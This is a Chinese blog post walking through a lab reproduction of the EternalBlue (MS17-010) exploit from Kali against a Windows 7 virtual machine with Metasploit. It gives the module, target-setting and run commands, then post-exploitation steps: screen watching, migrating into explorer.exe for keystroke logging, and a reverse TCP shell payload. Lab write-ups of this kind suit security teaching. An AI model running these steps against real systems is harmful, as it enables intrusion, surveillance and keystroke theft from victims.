永恒之蓝漏洞复现
  kbPBqeUpZBGD 2023年11月25日 30 0

仅在两台虚拟机中(kali,win7->靶机),使用MSF工具

1.关闭虚拟机win7系统的防火墙

2.打开kali的终端,安装MSF相关框架:

apt install Metasploit-framework

永恒之蓝漏洞复现_kali


3.初始化MSF

msfdb init

永恒之蓝漏洞复现_kali_02


4.启动MSF专用数据库:

service postgresql start

永恒之蓝漏洞复现_kali_03


5.启动MSF

msfconsole

永恒之蓝漏洞复现_kali_04


6.查找永恒之蓝模块:

search ms17-010

永恒之蓝漏洞复现_kali_05


7.选择使用的模块:

use exploit/windows/smb/ms17_010_eternablue

永恒之蓝漏洞复现_永恒之蓝_06


(检查RHOSTS,由于刚选择这个模块,所以他的RHOSTS的值是空的)

8.回到win7系统中,打开命令提示符,键入

ipconfig

查看IP地址(192.168.177.131

9.给RHOSTS设置参数并检查:

set rhosts 192.168.177.131

永恒之蓝漏洞复现_kali_07


(检查RHOSTS的值是否设置成功:show options)

10.RHOSTS参数设置成功后,键入:run开始,成功后显示meterpreter > ,这时候在其后键入screenshare监视win7屏幕

永恒之蓝漏洞复现_kali_08


永恒之蓝漏洞复现_kali_09


11.回到终端MSF界面,这时界面显示:meterpreter > ,继续键入:ps查看win7后台,记住explorer.exe的PID(1752)接着键入:migrate 1752开始键盘记录【完成后可按Ctrl+c结束记录,结束后会生产一个记录文件的路径,后续可使用终端root权限打开查看】

永恒之蓝漏洞复现_kali_10


12.若想进入win7命令行界面,键入:exit退出该模式,此时界面显示:msf6 exploit(windows/smb/ms17_010_eternablue) > ,然后键入:set payload windows/x64/shell/reverse_tcp以修改payload参数,此时键入run,等待片刻即可成功进入win7的shell界面【win7的shell界面可能有乱码,键入chcp 65001即可更改】

永恒之蓝漏洞复现_永恒之蓝_11


【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月25日 0

暂无评论